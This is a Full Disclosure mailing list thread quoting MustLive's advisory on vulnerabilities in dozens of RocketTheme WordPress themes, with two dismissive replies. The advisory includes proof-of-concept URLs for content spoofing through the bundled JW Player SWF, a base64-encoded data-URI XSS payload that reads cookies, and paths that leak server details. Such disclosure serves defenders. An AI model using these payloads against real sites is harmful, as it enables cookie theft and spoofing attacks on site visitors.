Full Disclosure mailing list archives
Re: Multiple vulnerabilities in RocketTheme themes for WordPress
From: "winsoc" <winsoc () gmail com>
Date: Sun, 30 Dec 2012 15:38:56 -0000
Cant help it, but J What a lewzer troll From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Julius Kivimäki Sent: 29 December 2012 22:55 To: MustLive Cc: full-disclosure () lists grok org uk; submissions () packetstormsecurity org Subject: Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress Full path disclosure, vulnerability? Ahahahahaha, good joke! You made my day. 2012/12/29 MustLive <mustlive () websecurity com ua> Hello list! Earlier I've wrote to the list about multiple vulnerabilities in multiple themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In that later I've mentioned 16 themes by RocketTheme (with Rokbox): Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian. I've wrote about 14 themes + 2 variations of 2 themes by these developers, but they have 47 themes for WordPress in total. Among them only three are free, and all other themes from RocketTheme are paid ones (it's needed to buy subscription to the club to receive access to them). And Rokbox is bundled with all these themes, except Grunge, which have all earlier-mentioned vulnerabilities. So I inform you about multiple vulnerabilities in 33 new themes for WordPress, which are developed by RocketTheme (Rokbox's developers). These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. ------------------------- Affected products: ------------------------- In these 32 themes (in addition to previous 16) there are Cross-Site Scripting, Content Spoofing, Full path disclosure and Information Leakage vulnerabilities. And Grunge theme has FPD holes. These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere, Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge. Affected all versions of these themes for WordPress. Since August I've informed the developers many times concerning vulnerabilities in Rokbox and their themes with it. ---------- Details: ---------- Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla yer.swf?file=1.flv <http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl ayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF> &backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla yer.swf?file=1.flv <http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl ayer.swf?file=1.flv&image=1.jpg> &image=1.jpg Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla yer.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config> Content Spoofing (WASC-12): http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla yer.swf?abouttext=Player <http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl ayer.swf?abouttext=Player&aboutlink=http://site> &aboutlink=http://site XSS (WASC-08): http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla yer.swf?abouttext=Player <http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl ayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydC hkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B> &aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9 zY3JpcHQ%2B Full path disclosure (WASC-13): In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other themes), which works at default PHP settings. Also potentially there are FPD in other php-files of these themes. Information Leakage (WASC-13): In some themes, similar to rt_mixxmag_wp, there can be error log with full paths. http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple vulnerabilities in RocketTheme themes for WordPress MustLive (Dec 29)
- Re: Multiple vulnerabilities in RocketTheme themes for WordPress Julius Kivimäki (Dec 30)
- Re: Multiple vulnerabilities in RocketTheme themes for WordPress winsoc (Dec 30)
- Re: Multiple vulnerabilities in RocketTheme themes for WordPress Julius Kivimäki (Dec 30)